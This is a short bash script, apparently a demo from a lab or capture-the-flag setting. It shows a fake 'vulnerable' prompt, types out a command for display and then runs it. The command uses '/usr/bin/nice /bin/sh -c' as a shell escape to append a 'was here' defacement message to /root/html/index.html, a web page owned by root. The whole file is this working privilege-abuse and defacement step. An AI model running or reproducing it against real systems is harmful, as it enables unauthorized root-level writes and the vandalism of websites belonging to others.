#!/bin/bash

echo -n "vulnerable:1> "
sleep 1
echo "/usr/bin/nice /bin/sh -c 'echo \"@Papadope9 was here BDE <3\" >> /root/html/index.html'" | pv -qL 10 
/usr/bin/nice /bin/sh -c 'echo "@Papadope9 was here BDE <3" >> /root/html/index.html'
exit
